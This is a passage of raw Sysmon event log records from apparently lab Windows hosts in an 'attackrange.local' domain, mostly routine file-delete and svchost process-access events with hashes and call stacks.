Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34AC8508FA1B4DAE2AE0FE217A1A74F7,SHA256=BE71D8AD5B939A657AC558DC98B262389494B6A054D92FBD41AA1385D2B21950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095338Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:58.026{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53C01E6515DE8377FB9E2069872A9A11,SHA256=BD3A30E0894096688D10013733833DC79B9969E192EDFD374AD1CBEDCC346C50,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606621Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:59.662{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606620Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:59.662{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C8E3B0A60AD72984943DF304AF97361,SHA256=F22EE2D009A37B805059ADE9EFA30AA03F760CA17EA3F89FA8DA59666A1BC023falsefalse - insufficient disk space 10341000x80000000000000001095346Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:59.530{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095345Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:59.530{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095344Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:59.032{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF920A72174958CD5BC93AEDDFD68023,SHA256=3011A3F096B550851427BEADEE3D4B3C67B79748333AC7AF0CB0C89DE5E851D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095350Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:00.567{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3F73D2EB2A7B05F4ACF6AA6F751872D,SHA256=68735D04441679D2BE61D0F2771D54C3332614817035DEB1D106AA312E976BD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095349Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:00.531{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095348Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:00.531{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095347Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:00.035{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=566CEAC28733B8B7454C7D932E617D11,SHA256=582566B395EFAB8F30705BBD09220ADE58BDB9036FC627E040502AC942956A90,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001606664Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D1-607D-0101-00000000BB01}4292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606663Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D1-607D-0101-00000000BB01}4292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606662Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D1-607D-0101-00000000BB01}4292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606661Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-EB00-00000000BB01}1744C:\Windows\System32\RuntimeBroker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606660Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-EB00-00000000BB01}1744C:\Windows\System32\RuntimeBroker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606659Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-EB00-00000000BB01}1744C:\Windows\System32\RuntimeBroker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606658Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-EB00-00000000BB01}1744C:\Windows\System32\RuntimeBroker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606657Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606656Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606655Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606654Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606653Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606652Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606651Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606650Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606649Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606648Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606647Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606646Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606645Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606644Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606643Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606642Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606641Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606640Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606639Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 